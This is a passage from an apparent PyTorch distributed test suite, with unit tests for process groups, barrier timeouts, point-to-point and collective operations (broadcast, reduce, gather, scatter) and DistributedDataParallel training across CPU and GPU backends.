os.unlink(os.path.join(test_dir, f_name))
self._barrier()
def test_get_backend(self):
if dist.get_world_size() > 2:
group = [1, 2]
else:
group = [0, 1]
group_id = dist.new_group(group)
backend_str = BACKEND.lower()
self.assertEqual(dist.get_backend(), backend_str)
if dist.get_rank() in group:
self.assertEqual(dist.get_backend(group_id), backend_str)
else:
with self.assertRaisesRegex(RuntimeError, "Invalid process group specified"):
dist.get_backend(group_id)
def test_Backend_enum_class(self):
# test parsing
backend = BACKEND.lower()
self.assertEqual(dist.Backend(BACKEND.upper()), backend)
self.assertEqual(dist.Backend(BACKEND), backend)
with self.assertRaisesRegex(ValueError, "Invalid backend: 'undefined'"):
dist.Backend("undefined")
with self.assertRaisesRegex(ValueError, "Invalid backend: 'xYz'"):
dist.Backend("xYz")
with self.assertRaises(ValueError):
dist.Backend(None)
with self.assertRaises(ValueError):
dist.Backend(3)
with self.assertRaises(ValueError):
dist.Backend(["gloo"])
# Test destroy
def test_destroy_group(self):
if dist.get_world_size() > 2:
group = [1, 2]
else:
group = [0, 1]
group_id = dist.new_group(group)
self._barrier()
dist.destroy_process_group(group_id)
# Test get rank and size of group
def test_get_rank_size_group(self):
if dist.get_world_size() > 2:
group = [1, 2]
else:
group = [0, 1]
group_id = dist.new_group(group)
if dist.get_rank() in group:
self.assertEqual(dist.get_world_size(group_id), 2)
self.assertTrue(dist.get_rank(group_id) in list(range(2)))
else:
self.assertEqual(dist.get_world_size(group_id), -1)
self.assertEqual(dist.get_rank(group_id), -1)
# Test destroy full groups
def test_destroy_full_group(self):
_, group_id, _ = self._init_full_group_test()
self._barrier()
dist.destroy_process_group(group_id)
# Test get rank and size of full group
def test_get_rank_size_full_group(self):
_, group_id, _ = self._init_full_group_test()
self.assertEqual(dist.get_world_size(group_id), dist.get_world_size())
self.assertEqual(dist.get_rank(group_id), dist.get_rank())
def _test_barrier_timeout(self, group_id, timeout):
local_rank = dist.get_rank(group_id)
# Only execute barrier on rank == 0, causing it to timeout
if local_rank == 0:
expected_time = time.time() + timeout.total_seconds()
with self.assertRaisesRegex(RuntimeError, " (Timed out|closed) "):
dist.barrier(group_id)
self.assertGreaterEqual(time.time(), expected_time)
else:
time.sleep(timeout.total_seconds())
@unittest.skipIf(BACKEND != "gloo", "Only gloo backend supports timeouts")
@unittest.skipIf(
not INIT_METHOD.startswith("file://"),
"Requires file:// initialization method. " +
"Both tcp:// and env:// rely on the TCP store for which "
"reinitialization has proven racy."
)
def test_barrier_timeout_global(self):
dist.destroy_process_group()
# Explicitly pass world size to the barrier because we've
# just destroyed any state in torch.distributed.
self._barrier(wait_for=int(WORLD_SIZE))
# Reinitialize global process group
timeout = timedelta(seconds=0.2)
dist.init_process_group(
init_method=INIT_METHOD,
backend=BACKEND,
world_size=int(WORLD_SIZE),
rank=self.rank,
timeout=timeout,
)
self._test_barrier_timeout(dist.group.WORLD, timeout)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND != "gloo", "Only gloo backend supports timeouts")
def test_barrier_timeout_group(self):
timeout = timedelta(seconds=0.2)
_, group_id, _ = self._init_group_test(timeout=timeout)
if group_id is not None:
self._test_barrier_timeout(group_id, timeout)
@unittest.skipIf(BACKEND != "gloo", "Only gloo backend supports timeouts")
def test_barrier_timeout_full_group(self):
timeout = timedelta(seconds=0.2)
_, group_id, _ = self._init_full_group_test(timeout=timeout)
if group_id is not None:
self._test_barrier_timeout(group_id, timeout)
# SEND RECV
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support send/recv")
def test_send_recv(self):
rank = dist.get_rank()
tensor = _build_tensor(rank + 1)
for src in range(0, dist.get_world_size()):
if src == rank:
# Send mode
for dst in range(0, dist.get_world_size()):
if dst == rank:
continue
dist.send(tensor, dst)
else:
# Recv mode
expected_tensor = _build_tensor(src + 1)
output_tensor = _build_tensor(src + 1, value=-1)
dist.recv(output_tensor, src)
self.assertEqual(output_tensor, expected_tensor)
self._barrier()
# SEND RECV ANY SOURCE
@unittest.skipIf(
BACKEND == "nccl", "Nccl does not support send/recv from any source"
)
def test_send_recv_any_source(self):
rank = dist.get_rank()
tensor = _build_tensor(10, value=rank)
recv_ranks = set()
for dst in range(0, dist.get_world_size()):
if dst == rank:
# Recv mode
for dst in range(0, dist.get_world_size()):
if dst == rank:
continue
output_tensor = _build_tensor(10, value=-1)
sender = dist.recv(output_tensor)
# Assert that the scalar value "sender" (which should equal the
# rank of the sending process) matches every value in the
# received tensor.
self.assertTrue(output_tensor.eq(sender).all())
recv_ranks.add(sender)
else:
# Send mode
dist.send(tensor, dst)
self.assertEqual(len(recv_ranks), dist.get_world_size() - 1)
self._barrier()
# SEND RECV WITH TAG
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support send/recv")
def test_send_recv_with_tag(self):
rank = dist.get_rank()
world_size = dist.get_world_size()
tensor = _build_tensor(10, value=rank)
for dst in range(0, world_size):
if dst == rank:
# Recv mode
for src in range(0, world_size):
if src == rank:
continue
output_tensor = _build_tensor(10, value=-1)
dist.recv(output_tensor, src, tag=src)
self.assertTrue(output_tensor.eq(src).all())
else:
# Send mode
dist.send(tensor, dst, tag=rank)
# ISEND
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support isend")
def test_isend(self):
rank = dist.get_rank()
world_size = dist.get_world_size()
if rank == 0:
requests = [
dist.isend(_build_tensor(dest, 10), dest)
for dest in range(1, world_size)
]
for request in requests:
request.wait()
self.assertTrue(request.is_completed())
else:
tensor = _build_tensor(rank, -1)
dist.recv(tensor, 0)
self.assertEqual(tensor, _build_tensor(rank, 10))
self._barrier()
# IRECV
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support irecv")
def test_irecv(self):
rank = dist.get_rank()
world_size = dist.get_world_size()
if rank == 0:
expected_tensors = [_build_tensor(src, -1) for src in range(1, world_size)]
requests = [
dist.irecv(expected_tensors[src - 1], src)
for src in range(1, world_size)
]
for src in range(1, world_size):
requests[src - 1].wait()
self.assertTrue(requests[src - 1].is_completed())
self.assertEqual(expected_tensors[src - 1], _build_tensor(src, 10))
else:
tensor = _build_tensor(rank, 10)
dist.send(tensor, 0)
self._barrier()
# BROADCAST
def _test_broadcast_helper(
self, group, group_id, rank, cuda=False, rank_to_GPU=None
):
for ttype, value, requires_cuda in [
("torch.FloatTensor", -1e-10, False),
("torch.DoubleTensor", -1e-100, False),
("torch.HalfTensor", -0.1, True),
("torch.CharTensor", -2, False),
("torch.ByteTensor", 129, False),
("torch.IntTensor", -1e5, False),
("torch.LongTensor", -1e15, False),
]:
if requires_cuda and not cuda:
continue
for src in group:
expected_tensor = _build_tensor(src + 1, value).type(ttype)
if cuda:
expected_tensor = expected_tensor.cuda(rank_to_GPU[rank][0])
if rank == src:
dist.broadcast(expected_tensor, src, group_id)
else:
tensor = _build_tensor(src + 1, -1).type(ttype)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.broadcast(tensor, src, group_id)
self.assertEqual(tensor.size(), expected_tensor.size())
self.assertEqual(tensor.ne(expected_tensor).max(), 0)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_broadcast(self):
group, group_id, rank = self._init_global_test()
self._test_broadcast_helper(group, group_id, rank)
@unittest.skipIf(
BACKEND != "gloo" and BACKEND != "nccl",
"Only Gloo and Nccl backend supports CUDA allReduce",
)
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_broadcast_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_broadcast_helper(group, group_id, rank, True, rank_to_GPU)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_broadcast_group(self):
group, group_id, rank = self._init_group_test()
self._test_broadcast_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_broadcast_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_broadcast_helper(group, group_id, rank)
# REDUCE
def _test_reduce_helper(
self,
group,
group_id,
rank,
op,
master_value,
worker_value,
expected_value,
cuda=False,
rank_to_GPU=None,
):
for src in group:
if rank == src:
tensor = _build_tensor(src + 1).fill_(master_value)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.reduce(tensor, src, op, group_id)
self.assertEqual(tensor, _build_tensor(src + 1, expected_value))
else:
tensor = _build_tensor(src + 1).fill_(worker_value)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.reduce(tensor, src, op, group_id)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_sum(self):
group, group_id, rank = self._init_global_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(BACKEND != "nccl", "Only Nccl supports CUDA reduce")
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_reduce_sum_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + 10 * (len(group) - 1),
True,
rank_to_GPU,
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_product(self):
group, group_id, rank = self._init_global_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_min(self):
group, group_id, rank = self._init_global_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_max(self):
group, group_id, rank = self._init_global_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_reduce_group_sum(self):
group, group_id, rank = self._init_group_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_reduce_group_product(self):
group, group_id, rank = self._init_group_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_reduce_group_min(self):
group, group_id, rank = self._init_group_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_reduce_group_max(self):
group, group_id, rank = self._init_group_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_full_group_sum(self):
group, group_id, rank = self._init_full_group_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_full_group_product(self):
group, group_id, rank = self._init_full_group_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_full_group_min(self):
group, group_id, rank = self._init_full_group_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_full_group_max(self):
group, group_id, rank = self._init_full_group_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10)
# ALL REDUCE
def _test_all_reduce_helper(
self,
group,
group_id,
rank,
op,
master_value,
worker_value,
expected_value,
cuda=False,
rank_to_GPU=None,
):
for src in group:
if rank == src:
tensor = _build_tensor(src + 1).fill_(master_value)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.all_reduce(tensor, op, group_id)
self.assertEqual(tensor, _build_tensor(src + 1, expected_value))
else:
tensor = _build_tensor(src + 1).fill_(worker_value)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.all_reduce(tensor, op, group_id)
self.assertEqual(tensor, _build_tensor(src + 1, expected_value))
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_sum(self):
group, group_id, rank = self._init_global_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(
BACKEND != "gloo",
"Only Gloo backend will have CUDA allReduce tested",
)
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_all_reduce_sum_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
True,
rank_to_GPU,
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_product(self):
group, group_id, rank = self._init_global_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_min(self):
group, group_id, rank = self._init_global_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_max(self):
group, group_id, rank = self._init_global_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10
)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_group_sum(self):
group, group_id, rank = self._init_group_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_group_product(self):
group, group_id, rank = self._init_group_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_group_min(self):
group, group_id, rank = self._init_group_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1
)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_group_max(self):
group, group_id, rank = self._init_group_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_full_group_sum(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_full_group_product(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_full_group_min(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_full_group_max(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10
)
# SCATTER
def _test_scatter_helper(self, group, group_id, rank):
for dest in group:
tensor = _build_tensor(dest + 1, -1)
expected_tensor = _build_tensor(dest + 1, rank)
tensors = (
[_build_tensor(dest + 1, i) for i in group] if rank == dest else []
)
dist.scatter(tensor, src=dest, scatter_list=tensors, group=group_id)
self.assertEqual(tensor, expected_tensor)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support scatter")
def test_scatter(self):
group, group_id, rank = self._init_global_test()
self._test_scatter_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support scatter")
@skip_if_small_worldsize
def test_scatter_group(self):
group, group_id, rank = self._init_group_test()
self._test_scatter_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support scatter")
def test_scatter_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_scatter_helper(group, group_id, rank)
# GATHER
def _test_gather_helper(self, group, group_id, rank):
for dest in group:
tensor = _build_tensor(dest + 1, rank)
tensors = (
[_build_tensor(dest + 1, -1) for i in group] if rank == dest else []
)
dist.gather(tensor, dst=dest, gather_list=tensors, group=group_id)
if rank == dest:
expected_tensors = [_build_tensor(dest + 1, i) for i in group]
for t1, t2 in zip(tensors, expected_tensors):
self.assertEqual(t1, t2)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_gather(self):
group, group_id, rank = self._init_global_test()
self._test_gather_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_gather_group(self):
group, group_id, rank = self._init_group_test()
self._test_gather_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_gather_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_gather_helper(group, group_id, rank)
# ALL GATHER
def _test_all_gather_helper(
self, group, group_id, rank, cuda=False, rank_to_GPU=None
):
for dest in group:
tensor = _build_tensor(dest + 1, rank)
tensors = [_build_tensor(dest + 1, -1) for i in group]
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
tensors = [t.cuda(rank_to_GPU[rank][0]) for t in tensors]
dist.all_gather(tensors, tensor, group_id)
expected_tensors = [_build_tensor(dest + 1, i) for i in group]
for t1, t2 in zip(tensors, expected_tensors):
self.assertEqual(t1, t2)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_gather(self):
group, group_id, rank = self._init_global_test()
self._test_all_gather_helper(group, group_id, rank)
@unittest.skipIf(BACKEND != "nccl", "Only Nccl supports CUDA all gather")
@unittest.skipIf(BACKEND == "nccl", "CUDA all gather skipped for NCCL")
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_all_gather_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_all_gather_helper(group, group_id, rank, True, rank_to_GPU)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_gather_group(self):
group, group_id, rank = self._init_group_test()
self._test_all_gather_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_gather_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_gather_helper(group, group_id, rank)
# BARRIER
def _test_barrier_helper(
self, group, group_id, rank, cuda=False, rank_to_GPU=None):
WAIT_TIME = 0.3 # seconds
for dest in group:
expected_time = torch.DoubleTensor(1).fill_(0.0)
if cuda:
expected_time = expected_time.cuda(rank_to_GPU[rank][0])
if dest == rank:
expected_time.fill_(time.time() + WAIT_TIME)
dist.broadcast(expected_time, dest, group_id)
time.sleep(WAIT_TIME + 0.1) # sleep a little bit longer
dist.barrier(group_id)
else:
dist.broadcast(expected_time, dest, group_id)
dist.barrier(group_id)
self.assertGreaterEqual(
float(time.time()),
float(expected_time[0]),
"destination rank: %d, my rank: %d" % (dest, rank) +
" (if you see this failure, please report in #14554)")
# Use higher timeout for the instance where the test runs
# against a subgroup and uses a CUDA tensor for expected time.
# The CUDA initialization for the participating processes can
# take long enough for the barrier timeout to trigger on the
# process that doesn't participate in the group.
self._barrier(timeout=20)
@skip_if_no_gpu
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't supports GPU barrier")
def test_barrier_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_barrier_helper(group, group_id, rank, True, rank_to_GPU)
@skip_if_small_worldsize
@skip_if_no_gpu
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't supports GPU barrier")
def test_barrier_group_cuda(self):
group, group_id, rank = self._init_group_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_barrier_helper(group, group_id, rank, True, rank_to_GPU)
@skip_if_small_worldsize
@skip_if_no_gpu
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't supports GPU barrier")
def test_barrier_full_group_cuda(self):
group, group_id, rank = self._init_full_group_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_barrier_helper(group, group_id, rank, True, rank_to_GPU)
@unittest.skipIf(BACKEND == "nccl", "NCCL does not support CPU barrier")
def test_barrier(self):
group, group_id, rank = self._init_global_test()
self._test_barrier_helper(group, group_id, rank)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "NCCL does not support CPU barrier")
def test_barrier_group(self):
group, group_id, rank = self._init_group_test()
self._test_barrier_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "NCCL does not support CPU barrier")
def test_barrier_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_barrier_helper(group, group_id, rank)
def _test_broadcast_multigpu_helper(self, group, group_id, rank, rank_to_GPU):
for src in group:
expected_tensor = _build_tensor(src + 1)
tensors = [
_build_tensor(src + 1, -1).cuda(device=i) for i in rank_to_GPU[rank]
]
if rank == src:
tensors[0] = expected_tensor.cuda(device=rank_to_GPU[rank][0])
dist.broadcast_multigpu(tensors, src, group_id)
for tensor in tensors:
self.assertEqual(tensor, expected_tensor)
self._barrier()
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't support broadcast multigpu")
@unittest.skipIf(BACKEND == "nccl", "NCCL broadcast multigpu skipped")
@skip_if_no_gpu
def test_broadcast_multigpu(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_broadcast_multigpu_helper(group, group_id, rank, rank_to_GPU)
def _test_all_reduce_multigpu_helper(
self,
group,
group_id,
rank,
rank_to_GPU,
op,
master_value,
worker_value,
expected_value,
):
for src in group:
if rank == src:
tensors = [
_build_tensor(src + 1, master_value).cuda(device=i)
for i in rank_to_GPU[rank]
]
else:
tensors = [
_build_tensor(src + 1, worker_value).cuda(device=i)
for i in rank_to_GPU[rank]
]
dist.all_reduce_multigpu(tensors, op, group_id)
expected_tensor = _build_tensor(src + 1, expected_value)
for tensor in tensors:
self.assertEqual(tensor, expected_tensor)
self._barrier()
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't support broadcast multigpu")
@unittest.skipIf(BACKEND == "nccl", "CUDA all_reduce multigpu skipped for NCCL")
@skip_if_no_gpu
def test_all_reduce_multigpu(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_all_reduce_multigpu_helper(
group,
group_id,
rank,
rank_to_GPU,
dist.ReduceOp.SUM,
2,
10,
(2 + 10 * (len(group) - 1)) * len(rank_to_GPU[0]),
)
def _test_reduce_multigpu_helper(
self,
group,
group_id,
rank,
rank_to_GPU,
op,
master_value,
worker_value,
expected_value,
):
for src in group:
if rank == src:
tensors = [
_build_tensor(src + 1, master_value).cuda(device=i)
for i in rank_to_GPU[rank]
]
dist.reduce_multigpu(tensors, src, op, group_id)
expected_tensor = _build_tensor(src + 1, expected_value)
self.assertEqual(tensors[0], expected_tensor)
else:
tensors = [
_build_tensor(src + 1, worker_value).cuda(device=i)
for i in rank_to_GPU[rank]
]
dist.reduce_multigpu(tensors, src, op, group_id)
self._barrier()
@unittest.skipIf(BACKEND != "nccl", "Only Nccl backend supports reduce multigpu")
@skip_if_no_gpu
def test_reduce_multigpu(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_reduce_multigpu_helper(
group,
group_id,
rank,
rank_to_GPU,
dist.ReduceOp.SUM,
2,
10,
(2 + 10 * (len(group) - 1)) * len(rank_to_GPU[0]),
)
def _test_all_gather_multigpu_helper(self, group, group_id, rank, rank_to_GPU):
for dest in group:
tensors = [
_build_tensor(dest + 1).cuda(device=i) for i in rank_to_GPU[rank]
]
            # construct the expected output along with
            # a placeholder to receive all_gather results
output_tensors = []
expected_output = []
output_per_gpu = (
[_build_tensor(dest + 1, -1)] * len(rank_to_GPU[0]) * len(group)
)
expected_per_gpu = (
[_build_tensor(dest + 1)] * len(rank_to_GPU[0]) * len(group)
)
for gpu in rank_to_GPU[rank]:
output_tensors.append([t.cuda(device=gpu) for t in output_per_gpu])
expected_output.append([t.cuda(device=gpu) for t in expected_per_gpu])
dist.all_gather_multigpu(output_tensors, tensors, group_id)
self.assertEqual(output_tensors, expected_output)
self._barrier()
@unittest.skipIf(BACKEND != "nccl", "Only Nccl backend supports allgather multigpu")
@skip_if_no_gpu
def test_all_gather_multigpu(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_all_gather_multigpu_helper(group, group_id, rank, rank_to_GPU)
def _model_step(self, model):
for param in model.parameters():
if param.grad is not None:
param.data += param.grad
param.grad = None
def _prepare_dummy_data(self, local_bs):
# global_bs for DDP should be divisible by WORLD_SIZE
global_bs = int(WORLD_SIZE) * local_bs
input_cpu = torch.randn(global_bs, 2)
target = torch.randn(global_bs, 4)
loss = nn.MSELoss()
return global_bs, input_cpu, target, loss
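    # Illustration: with WORLD_SIZE=4 and local_bs=2, global_bs is 8 and rank r
    # trains on rows [r*2:(r+1)*2] of input_cpu/target (see _test_DDP_5iter below).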
# END TO END TEST FOR DISTRIBUTEDDATAPARALLEL
def _test_DDP_helper(self, model, input_var, target, loss):
model.train()
output = model(input_var)
l = loss(output, target)
l.backward()
def _assert_equal_param(self, param_gpu, param_DDP):
self.assertEqual(len(param_gpu), len(param_DDP))
for p_gpu, p_DDP in zip(param_gpu, param_DDP):
self.assertEqual(p_gpu, p_DDP)
def _test_DDP_5iter(
self, model_base, model_DDP, input, target, loss, local_bs, rank, batch_size, test_save
):
for idx in range(5):
# single cpu/gpu training
self._test_DDP_helper(model_base, input, target, loss)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
self._test_DDP_helper(
model_DDP,
input[rank * local_bs: (rank + 1) * local_bs],
target[rank * local_bs: (rank + 1) * local_bs],
loss,
)
# Update weights and run a second iteration to shake out errors
self._model_step(model_base)
self._model_step(model_DDP)
self._assert_equal_param(
list(model_base.parameters()), list(model_DDP.module.parameters())
)
# Shuffle the input so that DDP input is different
input = input[torch.randperm(batch_size)]
# save the model in the middle and reload
if test_save and idx == 2 and INIT_METHOD.startswith("file://"):
_, filename = tempfile.mkstemp(prefix=FOLDER)
torch.save(model_DDP, filename)
model_DDP = torch.load(filename)
with tempfile.TemporaryFile() as tmp_file:
torch.save(model_DDP, tmp_file)
tmp_file.seek(0)
saved_model = torch.load(tmp_file)
for k in model_DDP.state_dict():
self.assertEqual(model_DDP.state_dict()[k],
saved_model.state_dict()[k])
def _test_DistributedDataParallel(self, gpu_subset, rank, output_device=None):
# Run a simple end to end DDP model, use result of single node model
# as baseline
# cpu training setup
model = DDP_NET
# single gpu training setup
model_gpu = copy.deepcopy(model)
model_gpu.cuda(gpu_subset[0])
# DDP training setup
model_DDP = copy.deepcopy(model)
model_DDP.cuda(gpu_subset[0])
model_DDP = nn.parallel.DistributedDataParallel(
model_DDP, device_ids=gpu_subset
)
# test serializable/unserializable
if INIT_METHOD.startswith("file://"):
_, filename = tempfile.mkstemp(prefix=FOLDER)
torch.save(model_DDP, filename)
model_DDP = torch.load(filename)
# dummy data initialization
local_bs = len(gpu_subset)
global_bs, input_cpu, target, loss = self._prepare_dummy_data(local_bs)
# check two model parameters over 5 iterations
self._test_DDP_5iter(
model_gpu,
model_DDP,
input_cpu.cuda(gpu_subset[0]),
target.cuda(gpu_subset[0]),
loss,
local_bs,
rank,
global_bs,
True
)
self._barrier()
@unittest.skipIf(
BACKEND == "nccl", "nccl does not support DistributedDataParallelCPU"
)
def test_DistributedDataParallelCPU(self):
# Run a simple end to end DDP-CPU model, use result of single node
# model as baseline
group, group_id, rank = self._init_global_test()
# cpu training setup
model_base = DDP_NET
# DDP-CPU training setup
model_DDP = copy.deepcopy(model_base)
model_DDP = nn.parallel.DistributedDataParallelCPU(model_DDP)
# dummy data initialization
local_bs = 2
global_bs, input_cpu, target, loss = self._prepare_dummy_data(local_bs)
# check two model parameters over 5 iterations
# TODO: add state pickling support for DistributedDataParallelCPU
self._test_DDP_5iter(
model_base, model_DDP, input_cpu, target, loss, local_bs, rank, global_bs, False
)
self._barrier()
@unittest.skipIf(BACKEND != 'nccl' and BACKEND != 'gloo',
"Only Nccl & Gloo backend support DistributedDataParallel")
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_DistributedDataParallel(self):
group, group_id, rank = self._init_global_test()
